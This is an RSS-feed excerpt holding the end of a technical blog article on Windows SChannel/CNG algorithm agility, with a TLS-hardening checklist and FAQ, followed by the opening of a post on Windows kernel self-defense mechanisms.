&lt;p&gt;Algorithm agility is necessary. It is not sufficient. TLS 1.0 was published in 1999 [@rfc-2246]; default-off in stable Windows did not arrive until 2024-2025 [@ms-learn-tls-registry-settings]. Twenty-five years. The substrate could have rotated TLS 1.0 out a decade earlier; the world would not move.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Agility lets the substrate add a new primitive and lets operators disable an old one. It cannot force operators of TLS-1.2-only or TLS-1.0-only endpoints to upgrade. The substrate solved the rotation problem; the world is the bottleneck. Trust-store distrust events, OS-level deprecation defaults, browser warnings, and eventual code-path removal are the levers that close the gap -- but each operates on the scale of years, not weeks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This re-organises the reader&apos;s understanding of why Microsoft&apos;s posture on PQC is &quot;ship and hedge&quot; rather than &quot;ship and declare victory.&quot; The substrate is ahead of the protocol; the protocol is ahead of the deployments; the deployments are years behind.&lt;/p&gt;
&lt;h3&gt;The downgrade-attack envelope&lt;/h3&gt;
&lt;p&gt;RFC 7568 (June 2015) formally prohibits SSL 3.0 [@rfc-7568]; RFC 6176 (March 2011) formally prohibits SSL 2.0 [@rfc-6176]. The TLS Fallback SCSV cipher suite (RFC 7507) bounded downgrade attacks within TLS 1.0 / 1.1 / 1.2. TLS 1.3&apos;s &lt;code&gt;ServerHello.random&lt;/code&gt; downgrade-resistance sentinel (RFC 8446 §4.1.3 [@rfc-8446]) closes the downgrade attack surface &lt;em&gt;within&lt;/em&gt; TLS 1.3. The remaining downgrade exposure lives at the boundary with TLS-1.2-only counterparties -- a boundary that shrinks every year but does not yet close.&lt;/p&gt;
&lt;h3&gt;Signature-side PQC and the chain-size problem&lt;/h3&gt;
&lt;p&gt;The PQC hybrid KEM transition is the easy half of the post-quantum migration. The signature side is harder. ML-DSA-65 produces ~3.3 KB signatures with ~2 KB public keys [@fips-204]; SLH-DSA at 128-bit security produces signatures in the 7 to 17 KB range [@fips-205]; Falcon (FN-DSA in the NIST nomenclature) produces ~1 KB signatures but is harder to implement correctly because of its floating-point Gaussian sampling.&lt;/p&gt;
&lt;p&gt;Why this matters for SChannel: TLS server certificate chains are sent in the &lt;code&gt;Certificate&lt;/code&gt; handshake message. A chain that fits inside TCP&apos;s initial congestion window (typically 10 segments, or about 14.6 KB) ships in one round trip; a chain that overflows the IW takes another RTT. Adding a 3.3 KB ML-DSA signature plus a 2 KB ML-DSA public key to every cert in a chain rapidly blows past 14.6 KB for a typical leaf-intermediate-root structure. The community working hypothesis is that the hybrid-signature transition in TLS will lag the hybrid-KEM transition by years; SymCrypt&apos;s Composite ML-DSA support (v103.12.0) [@symcrypt-changelog] is the substrate-side preparation for that transition, but the IETF TLS WG signature-side drafts are still in flight.&lt;/p&gt;
&lt;h3&gt;Composite-identifier namespace sprawl in CNG&lt;/h3&gt;
&lt;p&gt;Every hybrid construction adds at least one new CNG algorithm identifier. &lt;code&gt;X25519MLKEM768&lt;/code&gt;, &lt;code&gt;SecP256r1MLKEM768&lt;/code&gt;, &lt;code&gt;SecP384r1MLKEM1024&lt;/code&gt; already exist. Composite ML-DSA + ECDSA is in flight. If pure ML-KEM-1024 and pure SLH-DSA are eventually default-on, the algorithm namespace doubles per hybrid family. The substrate is &lt;em&gt;capable&lt;/em&gt; of absorbing the sprawl; whether the cipher-suite registry remains legible to administrators is a separate user-interface problem.&lt;/p&gt;
&lt;h3&gt;The opaque-engine bargain&lt;/h3&gt;
&lt;p&gt;SymCrypt is open since July 2019 and externally auditable [@symcrypt-github]. The SChannel SSP binary itself remains closed-source. External behavioural verification -- Hubert Kario&apos;s &lt;code&gt;tlsfuzzer&lt;/code&gt; -- is the closest the public has to a formal specification of &lt;code&gt;schannel.dll&lt;/code&gt;&apos;s wire-level behaviour [@tlsfuzzer-github]. The project&apos;s framing is precise: it &quot;doesn&apos;t check only that the system under test didn&apos;t crash, it checks that it returned correct error messages&quot; [@tlsfuzzer-github]. That is the closest practitioners get to a behavioural spec without source.&lt;/p&gt;
&lt;p&gt;The asymmetry has a name in the article&apos;s argument: open-source substrate, closed-source SSP. The agility receipts of Sections 5 and 9 are auditable at the primitive layer. The parsing-path correctness of Section 6 is not -- the coordinated-disclosure intake of MS14-066 (with IBM X-Force researcher Robert Freeman credited as the discoverer per the bulletin&apos;s acknowledgments [@ms14-066]) is the kind of receipt the binary-only delivery model can produce. Modern external fuzzing has narrowed the gap but does not close it.&lt;/p&gt;
&lt;h3&gt;Legacy protocol &lt;em&gt;removal&lt;/em&gt; versus disablement&lt;/h3&gt;
&lt;p&gt;Disablement by default is universal in Windows 11 / Server 2022+. &lt;em&gt;Removing the negotiation code paths&lt;/em&gt; is a separate, slower trajectory. SSL 3.0&apos;s code paths are largely gone from current SChannel; TLS 1.0 / 1.1 code paths remain reachable behind registry flags because some long-tail enterprise scenarios still require them. The protocol surface of SChannel is wider than its default-enabled surface; an audit posture must account for the difference.&lt;/p&gt;
&lt;h3&gt;Dead ends and the diseases they failed to cure&lt;/h3&gt;
&lt;p&gt;The five agility receipts of Section 5 are the &lt;em&gt;primitive-rotation&lt;/em&gt; story. But not every TLS failure is a primitive failure, and the substrate could not save Windows from the four most-instructive engineering dead ends the IETF eventually had to legislate out of the protocol itself. &lt;strong&gt;CRIME / TLS-level DEFLATE compression&lt;/strong&gt; (Rizzo and Duong, ekoparty 2012) was a compression-then-encryption side-channel that no primitive substitution could fix; TLS 1.3 removed compression from the protocol entirely (RFC 8446 §4.1.2 [@rfc-8446]) and SChannel never shipped TLS-level compression in the first place. &lt;strong&gt;Insecure renegotiation (CVE-2009-3555)&lt;/strong&gt; -- Ray and Dispensa, November 2009 -- let an MITM splice attacker-prefix application data into a victim&apos;s authenticated session because the mid-session re-handshake had no transcript binding to the prior session; RFC 5746 (Eric Rescorla et al., February 2010 [@rfc-5746]) added the &lt;code&gt;renegotiation_info&lt;/code&gt; extension, Microsoft shipped the fix in SChannel via KB977377 / KB980436 in early 2010, and TLS 1.3 removed renegotiation outright in favour of the narrowly-scoped &lt;code&gt;KeyUpdate&lt;/code&gt; message and post-handshake &lt;code&gt;CertificateRequest&lt;/code&gt;. &lt;strong&gt;Anonymous Diffie-Hellman cipher suites&lt;/strong&gt; (TLS 1.0 through 1.2 specified &lt;code&gt;TLS_DH_anon_*&lt;/code&gt; and &lt;code&gt;TLS_ECDH_anon_*&lt;/code&gt; with no server certificate at all -- forward secrecy without authentication) were off-by-default in every major stack including SChannel and removed from the TLS 1.3 cipher-suite namespace entirely. &lt;strong&gt;Export-grade RSA / FREAK&lt;/strong&gt; (Beurdouche, Bhargavan and colleagues, IEEE S&amp;amp;P 2015 [@smacktls]) used roughly $100 of EC2 compute to break 512-bit RSA in hours and force-downgrade non-export-aware servers; Microsoft pruned the export-RSA suites from SChannel&apos;s default set via MS15-031 / KB3046049 in March 2015 [@smacktls].&lt;/p&gt;
&lt;p&gt;These four dead ends share a structural lesson: each is a &lt;em&gt;different axis of failure&lt;/em&gt;. CRIME was a side-channel no algorithm could fix. Insecure renegotiation was a feature whose protocol design admitted MITM splicing. Anonymous DH was a configuration the protocol should never have exposed. FREAK was an obsolete primitive whose continued availability invited downgrade. All four sit &lt;em&gt;above&lt;/em&gt; the substrate -- none is a primitive-design defect like MD5 or DES-56. The thesis the article advances -- that the substrate changed because it &lt;em&gt;had to support&lt;/em&gt; the changes but did not &lt;em&gt;invent&lt;/em&gt; them -- is illustrated negatively by these four: the &lt;em&gt;protocol&lt;/em&gt; axis had to do the work, often by removal rather than refinement. The agility receipt of Section 5 G5 (TLS 1.0 / 1.1 disablement) is, in this light, just the most visible item in a longer ledger.&lt;/p&gt;
&lt;p&gt;If the theoretical limits are humbling, the practical day-to-day -- &quot;what should I actually do with my SChannel-served TLS endpoints this Monday morning?&quot; -- has a much cleaner set of answers.&lt;/p&gt;
&lt;h2&gt;12. Practical Guide: Nine Things to Do on a Windows-Served TLS Endpoint&lt;/h2&gt;
&lt;p&gt;A working operator&apos;s reference distilled to the essentials -- the nine things that, if you do nothing else this quarter, materially improve the security posture of a Windows-served TLS endpoint.&lt;/p&gt;
&lt;h3&gt;1. Inventory&lt;/h3&gt;
&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;# Cipher suites enabled on this host, in negotiation order
Get-TlsCipherSuite | Select-Object -Property Name, Cipher, CipherLength, KeyType, Exchange

# ECC named groups (TLS 1.3 key shares; X25519, secp256r1, secp384r1; PQC hybrids on newer builds)
Get-TlsEccCurve
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Pair this with a registry walk of &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\&lt;/code&gt; -- &lt;code&gt;Protocols\&amp;lt;ver&amp;gt;\&amp;lt;role&amp;gt;\Enabled&lt;/code&gt; and &lt;code&gt;DisabledByDefault&lt;/code&gt; for protocol versions, &lt;code&gt;Ciphers\&amp;lt;algorithm&amp;gt;\Enabled&lt;/code&gt; for primitive disables, and &lt;code&gt;Hashes\&amp;lt;algorithm&amp;gt;\Enabled&lt;/code&gt; for handshake-hash disables [@ms-learn-tls-registry-settings].&lt;/p&gt;
&lt;h3&gt;2. Disable the legacy protocol versions&lt;/h3&gt;
&lt;p&gt;Set &lt;code&gt;SCHANNEL\Protocols\SSL 3.0\&amp;lt;role&amp;gt;\Enabled = 0&lt;/code&gt; and &lt;code&gt;DisabledByDefault = 1&lt;/code&gt; for both &lt;code&gt;Client&lt;/code&gt; and &lt;code&gt;Server&lt;/code&gt; sub-keys. Repeat for TLS 1.0 and TLS 1.1. The asymmetry between &lt;code&gt;Client&lt;/code&gt; and &lt;code&gt;Server&lt;/code&gt; hives bites: an outbound &lt;code&gt;WinHTTP&lt;/code&gt; call from your IIS worker is governed by the &lt;code&gt;Client&lt;/code&gt; sub-key even though the server itself is gated by &lt;code&gt;Server&lt;/code&gt; [@ms-learn-tls-registry-settings].&lt;/p&gt;
&lt;h3&gt;3. Disable RC4 and 3DES at the cipher level&lt;/h3&gt;
&lt;p&gt;RC4: KB2868725 [@ms-advisory-2868725] introduced the mechanism. Set &lt;code&gt;Ciphers\RC4 40/128\Enabled = 0&lt;/code&gt;, &lt;code&gt;Ciphers\RC4 56/128\Enabled = 0&lt;/code&gt;, &lt;code&gt;Ciphers\RC4 64/128\Enabled = 0&lt;/code&gt;, &lt;code&gt;Ciphers\RC4 128/128\Enabled = 0&lt;/code&gt;. 3DES: &lt;code&gt;Ciphers\Triple DES 168\Enabled = 0&lt;/code&gt;. Then verify with &lt;code&gt;Get-TlsCipherSuite&lt;/code&gt; that no &lt;code&gt;*RC4*&lt;/code&gt; or &lt;code&gt;*3DES*&lt;/code&gt; suites are still listed.&lt;/p&gt;
&lt;h3&gt;4. Cipher-suite ordering for TLS 1.2&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;SSL Cipher Suite Order&lt;/code&gt; GPO is the lever. Put &lt;code&gt;ECDHE&lt;/code&gt; + &lt;code&gt;AES-GCM&lt;/code&gt; suites at the top; keep CHACHA20-POLY1305 as a fallback for clients without AES-NI; pull legacy AES-CBC suites to the bottom. The Microsoft Learn &quot;Manage TLS&quot; page walks through the GPO interaction [@ms-learn-manage-tls].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Setting an explicit cipher-suite order via the older &lt;code&gt;SSL Cipher Suite Order&lt;/code&gt; GPO can accidentally exclude TLS 1.3 cipher suites if the list does not enumerate them. The TLS 1.3 suites (&lt;code&gt;TLS_AES_128_GCM_SHA256&lt;/code&gt;, &lt;code&gt;TLS_AES_256_GCM_SHA384&lt;/code&gt;, &lt;code&gt;TLS_CHACHA20_POLY1305_SHA256&lt;/code&gt;) must appear in the configured list, otherwise TLS 1.3 effectively gets disabled on the host. Verify with &lt;code&gt;Get-TlsCipherSuite&lt;/code&gt; after applying any GPO change.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;5. Enable OCSP stapling on IIS, and enable CAPI2/Operational logging for distrust observability&lt;/h3&gt;
&lt;p&gt;OCSP stapling is on by default in modern IIS. Verify that your front door is sending stapled responses (via &lt;code&gt;openssl s_client -status -connect host:443 &amp;lt; /dev/null | grep -i ocsp&lt;/code&gt; from a test client). If your CA does not support OCSP for the issued cert, the stapling fails silently and you lose the revocation channel; pick a CA that does.&lt;/p&gt;
&lt;p&gt;For trust-store observability, enable the per-host CAPI2/Operational tracing channel with &lt;code&gt;wevtutil sl Microsoft-Windows-CAPI2/Operational /e:true&lt;/code&gt; and watch for the chain-engine events the Microsoft Learn FCPCA-removal article enumerates: Event ID 11 (chain-build failures), Event ID 30 (SSL or NTAuth policy failures), Event ID 90 (every certificate consulted during chain build) [@ms-learn-fcpca-removal]. The FCPCA article also documents the empirical &quot;one to seven days&quot; propagation latency between an MTRP distrust landing in &lt;code&gt;authrootstl.cab&lt;/code&gt; and a given client actually applying it -- the same window applies to any future CCADB-coordinated removal (cross-reference Section 7).&lt;/p&gt;
&lt;h3&gt;6. Enforce RunAsPPL &lt;strong&gt;and&lt;/strong&gt; Credential Guard&lt;/h3&gt;
&lt;p&gt;These are &lt;em&gt;complementary&lt;/em&gt;, not alternatives [@itm4n-runasppl]. Set &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1&lt;/code&gt; and reboot; verify LSASS comes back as a Protected Process with &lt;code&gt;Get-Process lsass | Select Name, Protect*&lt;/code&gt; [@ms-learn-lsa-protection]. Then enable Credential Guard via Group Policy or MDM; on most newer Windows 11 builds it is on by default [@ms-learn-credential-guard]. Auditing-only mode (&lt;code&gt;AuditLevel&lt;/code&gt;) is the right step before enforcement to identify any legacy LSA plug-ins that fail to load as PPL.&lt;/p&gt;
&lt;h3&gt;7. Lock down CredSSP / RDP NLA on Remote Desktop Session Hosts&lt;/h3&gt;
&lt;p&gt;Confirm Network Level Authentication is enabled on any RDP Session Host (it has been default-on since Windows Server 2012 R2) [@ms-archive-nla]. Confirm the host is running CredSSP version 5 or higher, so the channel-binding hash mechanism that replaced the broken pre-CVE-2018-0886 &quot;encrypt the public key + 1&quot; scheme is in force [@ms-cssp-sequencing]. For any administrative jump-host scenario where the destination&apos;s plaintext-credential exposure must be zero, use &lt;strong&gt;Remote Credential Guard&lt;/strong&gt; (&lt;code&gt;TSRemoteGuardCreds&lt;/code&gt;) -- the destination receives only a service ticket usable for the session, not a reusable password or hash. Pair NLA enforcement with the certificate-validation knobs in item 5: the SChannel server certificate the CredSSP TLS handshake validates is the same one a TLS-only audit covers, so the trust pipeline reuse is exact.&lt;/p&gt;
&lt;h3&gt;8. FIPS-mode toggle: what &lt;code&gt;FipsAlgorithmPolicy = 1&lt;/code&gt; actually means in 2026&lt;/h3&gt;
&lt;p&gt;The Local Security Policy setting &quot;&lt;strong&gt;System cryptography: Use FIPS compliant algorithms for encryption, hashing, and signing&lt;/strong&gt;&quot; (registry: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy\Enabled = 1&lt;/code&gt;) is the operator-side policy lever that pins SChannel, EFS, BitLocker, and RDP encryption to the FIPS 140-validated subset of CNG&apos;s catalog [@ms-learn-fips-policy]. The &quot;what it disables&quot; question has changed since the legacy &quot;TLS_RSA_WITH_3DES_EDE_CBC_SHA only&quot; framing on the policy reference page itself [@ms-learn-fips-policy]. The modern Microsoft Learn &quot;TLS Cipher Suites in Windows 11&quot; page is explicit that &quot;FIPS-compliance has become more complex with the addition of elliptic curves making the FIPS mode enabled column in previous versions of this table misleading,&quot; and points readers to NIST SP 800-52 Rev. 2 section 3.3.1 for the authoritative FIPS-approved TLS 1.2 / 1.3 cipher-suite list [@ms-learn-tls-cipher-suites-windows-11][@nist-sp-800-52r2].&lt;/p&gt;
&lt;p&gt;In practice on a Windows 11 / Server 2022 box with &lt;code&gt;FipsAlgorithmPolicy = 1&lt;/code&gt;: SChannel will negotiate TLS 1.3&apos;s &lt;code&gt;TLS_AES_128_GCM_SHA256&lt;/code&gt; and &lt;code&gt;TLS_AES_256_GCM_SHA384&lt;/code&gt; (the third TLS 1.3 mandatory suite, &lt;code&gt;TLS_CHACHA20_POLY1305_SHA256&lt;/code&gt;, is &lt;strong&gt;not&lt;/strong&gt; FIPS-approved because ChaCha20-Poly1305 is not on the FIPS algorithm list); for TLS 1.2 it will negotiate the ECDHE-with-AES-GCM and ECDHE-with-AES-CBC-SHA2 variants over the NIST curves P-256, P-384, and P-521 only; the X25519 named group is &lt;strong&gt;not&lt;/strong&gt; FIPS-approved as of the May 2026 Windows servicing snapshot; and the X25519MLKEM768 hybrid in Insider channels is &lt;strong&gt;not&lt;/strong&gt; FIPS-approved either, because of the X25519 component.&lt;/p&gt;
&lt;p&gt;Two-sided framing: &lt;strong&gt;SymCrypt&apos;s FIPS 140-3 validation is the &lt;em&gt;engine-side receipt&lt;/em&gt;; &lt;code&gt;FipsAlgorithmPolicy = 1&lt;/code&gt; is the &lt;em&gt;consumer-side policy lever&lt;/em&gt; that pins consumers to the validated subset.&lt;/strong&gt; Both are required for the system to be &quot;operating in FIPS mode&quot; in the CMVP sense [@ms-learn-fips-140-validation]. At the BCrypt layer, FIPS enforcement is &lt;em&gt;opt-in&lt;/em&gt; via a CNG flag that callers pass to &lt;code&gt;BCryptOpenAlgorithmProvider&lt;/code&gt;; SChannel honours the system policy directly, but legacy applications loading deprecated CryptoAPI 1.0 CSPs (&lt;code&gt;PROV_RSA_FULL&lt;/code&gt;, &lt;code&gt;rsaenh.dll&lt;/code&gt;, etc.) bypass the toggle entirely [@ms-learn-cryptographic-provider-types].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Enabling &lt;code&gt;FipsAlgorithmPolicy = 1&lt;/code&gt; is prospective only. It affects &lt;em&gt;future&lt;/em&gt; BCrypt opens, &lt;em&gt;future&lt;/em&gt; SChannel handshakes, and &lt;em&gt;future&lt;/em&gt; EFS encryptions. It does &lt;strong&gt;not&lt;/strong&gt; re-derive existing TLS session keys, does &lt;strong&gt;not&lt;/strong&gt; re-encrypt existing EFS-protected files, and may break RDP between a FIPS-on Server 2022 host and a not-FIPS-configured Windows 10 1809 client because the two ends can no longer agree on a common cipher suite. Plan rollout carefully and verify mixed-version paths before flipping the bit fleet-wide.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;9. Pilot the PQC hybrid where you can&lt;/h3&gt;
&lt;p&gt;Where Windows builds support &lt;code&gt;X25519MLKEM768&lt;/code&gt; -- presently Insider Preview channels per the CNG ML-KEM page&apos;s banner [@ms-learn-cng-mlkem-examples] -- pilot the hybrid against an internal client. Validate via Wireshark (looking for the &lt;code&gt;X25519MLKEM768&lt;/code&gt; named-group selector in &lt;code&gt;ClientHello&lt;/code&gt; / &lt;code&gt;ServerHello&lt;/code&gt; &lt;code&gt;key_share&lt;/code&gt; extensions) and a &lt;code&gt;curl&lt;/code&gt; build with ML-KEM support. Measure connection-establishment latency; for a typical handshake the additional ~5-10 ms is in the noise (see the §9 PQC handshake budget Callout for the TPM-bound exception).&lt;/p&gt;

The `X25519MLKEM768` named group has IANA codepoint `0x11ec`. A Wireshark display filter of `tls.handshake.extensions_key_share_group == 0x11ec` flags handshakes that negotiated the hybrid. Combined with `tls.handshake.version == 0x0304`, you can quickly spot whether a peer actually used the PQC hybrid or fell back to plain X25519.
&lt;h3&gt;Common pitfalls&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;Client&lt;/code&gt; vs &lt;code&gt;Server&lt;/code&gt; asymmetry.&lt;/strong&gt; Two sub-keys, two hives, four registry edits per protocol version. Tooling like &lt;code&gt;IISCrypto&lt;/code&gt; automates the matrix; doing it by hand is the most common source of &quot;we thought we disabled TLS 1.0 but our outbound WinHTTP still negotiates it&quot; tickets.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;SCH_USE_STRONG_CRYPTO&lt;/code&gt;&lt;/strong&gt; -- the SCHANNEL_CRED flag is per-call, not per-machine. .NET sets it by default on modern targets but historically didn&apos;t on .NET Framework 4.5.x. If you maintain old .NET Framework workloads, audit them.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;SSLKEYLOGFILE&lt;/code&gt;&lt;/strong&gt; -- SChannel does not export keys to &lt;code&gt;SSLKEYLOGFILE&lt;/code&gt;. Wireshark cannot decrypt SChannel-served TLS traffic without separate key extraction (etw-based, or a TLS-terminating proxy). Plan your packet-capture strategy accordingly.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If the practical guide is the &quot;what to do,&quot; the FAQ that follows is the &quot;what to stop believing.&quot;&lt;/p&gt;
&lt;h2&gt;13. Frequently Asked Questions&lt;/h2&gt;

No. They were different bugs, different stacks, different vendors. **Heartbleed (CVE-2014-0160), April 7, 2014, was a flaw in OpenSSL&apos;s TLS Heartbeat extension code path** [@nvd-cve-2014-0160]. **MS14-066 / CVE-2014-6321 (&quot;WinShock&quot;), November 11, 2014, was a pre-authentication remote code execution in SChannel&apos;s TLS message-parsing path** [@ms14-066][@nvd-cve-2014-6321], disclosed under coordinated vulnerability disclosure and credited by IBM X-Force to researcher Robert Freeman. SChannel does not implement OpenSSL&apos;s Heartbeat code and was not affected by Heartbleed; Microsoft confirmed this publicly in April 2014. The two events have been blended in many secondary accounts since.

No. CVE-2014-6321 had a public Patch Tuesday bulletin (MS14-066, November 11, 2014) [@ms14-066], a US-CERT alert (TA14-318A, November 18, 2014) [@uscert-ta14-318a], and a CERT/CC vulnerability note (VU#505120) [@certcc-vu505120]. The &quot;silently patched&quot; framing in some accounts refers to the *additional* SChannel hardening fixes Microsoft bundled into the same KB without separate bulletins, not to the headline CVE itself. This article does not assign specific CVE IDs to those bundled extras.

No. **ZeroLogon affected the Netlogon Remote Protocol (MS-NRPC), implemented in `netlogon.dll`**. The &quot;Netlogon secure channel&quot; and the &quot;SChannel SSP&quot; (`schannel.dll`, the TLS provider this article is about) share a name root but are different protocols, different DLLs, different code paths, and different bug classes. Confusing the two is one of the most common Windows-security naming traps.

Yes -- they are complementary, not alternatives [@itm4n-runasppl]. **PPL is a same-privilege gate inside Virtual Trust Level 0 (VTL0)**: it stops a non-PPL process from opening LSASS for memory read [@ms-learn-lsa-protection]. **Credential Guard moves credential material into the `LSAIso` trustlet at VTL1**, behind the VBS / Hyper-V boundary [@ms-learn-credential-guard]. They protect against different threats and stack rather than substitute.

No. The Microsoft Learn page for the CNG ML-KEM API carries an explicit &quot;prerelease product / Windows Insider Preview&quot; banner as of mid-2026 [@ms-learn-cng-mlkem-examples]. The primitive ships in SymCrypt v103.5.0 and later [@symcrypt-changelog]; the CNG and SChannel surfaces are rolling through the Insider channel. Track the Microsoft Tech Community PQC posts for OS-channel GA announcements [@ms-tech-community-pqc][@ms-tech-community-pqc-companion].

On Windows, yes. On Linux .NET delegates `SslStream` to OpenSSL; on macOS it uses Apple&apos;s Network framework. PQC support follows the underlying stack, so the same .NET binary&apos;s TLS posture differs by host OS in mid-2026.

Because the *agility property* the article is about is anchored to CNG, which shipped in Vista in January 2007 [@ms-learn-cng-portal] -- about nineteen years to mid-2026. Pre-CNG SChannel was not algorithm-agile in any meaningful sense: primitives were baked into CryptoAPI 1.0 CSP DLLs, ECC could not be expressed in the `ALG_ID + key BLOB` model at all, and adding a new algorithm required a CSP rev plus an OS release. CNG is when &quot;rotate every cipher&quot; stopped being a slogan and started being a property the substrate could deliver. The thirty-year framing would be arithmetically accurate but argumentatively wrong.
&lt;p&gt;The Microsoft TLS stack has spent twenty years proving that one architectural decision -- decouple algorithms from DLLs, addressed by string identifier through a stable provider model -- can carry a vendor through every primitive rotation cryptography throws at it. The receipts now include a post-quantum hybrid key exchange that runs through the same dispatch path Vista shipped in 2007. The next test, the signature-side PQC transition, is already in flight inside SymCrypt. Whatever the world chooses to do with those primitives, the substrate is ready.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;schannel-twenty-year-algorithm-agility&quot; keyTerms={[
  { term: &quot;SChannel SSP&quot;, definition: &quot;The Microsoft Security Support Provider (schannel.dll) implementing SSL, TLS, and DTLS on Windows.&quot; },
  { term: &quot;CNG (Cryptography API: Next Generation)&quot;, definition: &quot;Vista-era substrate replacing CryptoAPI 1.0; splits into BCrypt (primitives) and NCrypt (key custodians).&quot; },
  { term: &quot;BCrypt&quot;, definition: &quot;CNG API for primitive cryptographic operations addressed by string algorithm identifier.&quot; },
  { term: &quot;NCrypt&quot;, definition: &quot;CNG API for key custodians via pluggable Key Storage Providers (software, smart card, TPM, HSM).&quot; },
  { term: &quot;KSP (Key Storage Provider)&quot;, definition: &quot;Pluggable NCrypt module that owns a private key&apos;s lifecycle and operations.&quot; },
  { term: &quot;SymCrypt&quot;, definition: &quot;Microsoft&apos;s unified FIPS-validated primitive engine started by Niels Ferguson in late 2006; open-sourced under MIT in July 2019.&quot; },
  { term: &quot;AEAD&quot;, definition: &quot;Authenticated Encryption with Associated Data; single-pass encrypt-and-authenticate construction that eliminates mac-then-encrypt padding-oracle bugs.&quot; },
  { term: &quot;ECDHE&quot;, definition: &quot;Ephemeral Elliptic-Curve Diffie-Hellman; provides forward secrecy by deriving each session key from a fresh elliptic-curve key pair.&quot; },
  { term: &quot;ML-KEM&quot;, definition: &quot;FIPS 203 module-lattice-based Key Encapsulation Mechanism; the NIST-standardised PQC KEM that X25519MLKEM768 wraps.&quot; },
  { term: &quot;PPL (Protected Process Light)&quot;, definition: &quot;Same-privilege process-protection gate inside VTL0; blocks non-PPL callers from opening LSASS for memory read when RunAsPPL is enabled.&quot; },
  { term: &quot;CertGetCertificateChain&quot;, definition: &quot;The Windows chain-building API that walks from leaf to trusted root with revocation, name-constraint, and EKU enforcement.&quot; },
  { term: &quot;MS14-066 / WinShock&quot;, definition: &quot;Pre-authentication SChannel parsing-path RCE (CVE-2014-6321), patched November 11, 2014; not Heartbleed.&quot; }
]} questions={[
  { q: &quot;Name the structural property of CryptoAPI 1.0 that prevented ECC from being expressed.&quot;, a: &quot;The ALG_ID + key BLOB model could not represent named curves, parameter sets, or point compression -- ECC&apos;s identity is per-curve, not per-algorithm-type.&quot; },
  { q: &quot;What two API splits did CNG introduce, and what does each abstract?&quot;, a: &quot;BCrypt abstracts primitives (algorithms by string identifier); NCrypt abstracts key custodians (via Key Storage Providers).&quot; },
  { q: &quot;Why is the &apos;twenty-year algorithm-agility&apos; frame anchored to 2007 rather than 1996?&quot;, a: &quot;CNG (2007) is when algorithm agility became a first-class substrate property. Pre-CNG SChannel was protocol-agile (it could rotate SSL/TLS versions) but not primitive-agile -- adding a new primitive required a CSP DLL rev.&quot; },
  { q: &quot;What is the SChannel-side disambiguation between MS14-066 and Heartbleed?&quot;, a: &quot;MS14-066 was a pre-auth RCE in SChannel&apos;s TLS parsing path (Microsoft, November 2014). Heartbleed was an OpenSSL Heartbeat over-read (April 2014). SChannel does not implement the OpenSSL Heartbeat code path.&quot; },
  { q: &quot;What concrete handshake-time data does the X25519MLKEM768 named group concatenate?&quot;, a: &quot;ClientHello key_share is mlkem_pk || x25519_pk (1216 B); ServerHello key_share is mlkem_ct || x25519_pk (1120 B); both sides derive shared_secret = mlkem_ss || x25519_ss (64 B) and feed it to TLS 1.3&apos;s HKDF-Extract.&quot; },
  { q: &quot;Why are PPL (RunAsPPL) and Credential Guard described as complementary rather than substitutes?&quot;, a: &quot;PPL is a same-privilege gate inside VTL0 (it blocks OpenProcess(LSASS, VM_READ) from non-PPL callers). Credential Guard moves credential material into the LSAIso trustlet at VTL1 behind the VBS / Hyper-V boundary. They protect against different attack classes.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>tls</category><category>cryptography</category><category>post-quantum</category><category>schannel</category><category>cng</category><category>algorithm-agility</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>The Same-Privilege Paradox: Twenty-One Years of Windows Kernel Self-Defense</title><link>https://paragmali.com/blog/the-same-privilege-paradox-twenty-one-years-of-windows-kerne/</link><guid isPermaLink="true">https://paragmali.com/blog/the-same-privilege-paradox-twenty-one-years-of-windows-kerne/</guid><description>PatchGuard, KASLR, KDP, and the Win32k Lockdown are four answers to one paradox -- a defense at the attacker&apos;s privilege cannot succeed in principle. The 2005-2026 trajectory is migration out of the kernel.</description><pubDate>Wed, 03 Jun 2026 00:00:00 GMT</pubDate><content:encoded>
Microsoft has spent twenty-one years defending the Windows kernel from itself. PatchGuard, KASLR, KDP, and the Win32k Lockdown are four answers to a single problem -- the **same-privilege paradox**, that a defense at the attacker&apos;s privilege level cannot succeed in principle. The trajectory is migration: from in-kernel obfuscation (PatchGuard, 2005), to address-space tricks (KASLR 2007, KVA Shadow 2018), to hypervisor-anchored isolation (KDP, 2020), and finally to attack-surface deletion (Win32k filter, 2017). Microsoft&apos;s own Security Servicing Criteria say PatchGuard is not a security boundary [@ms-servicing-criteria], and that admission is the load-bearing premise of every modern Windows kernel mitigation.
&lt;h2&gt;1. If the attacker is already in the kernel, what is left to defend?&lt;/h2&gt;
&lt;p&gt;For three years, a Russian-attributed espionage rootkit called Uroburos ran on Microsoft&apos;s most heavily defended kernel -- the 64-bit Windows kernel with PatchGuard active -- and PatchGuard never made a sound [@gdata-uroburos-blog]. The reason is the one the marketing copy will not tell you: PatchGuard is not, and was never designed to be, a security boundary; Microsoft says so in its own Security Servicing Criteria [@ms-servicing-criteria]. The twenty-one-year history of Windows kernel self-defense is the story of why the answer to &quot;the kernel cannot defend itself from itself&quot; turned out to be &quot;stop trying to defend it from inside.&quot;&lt;/p&gt;
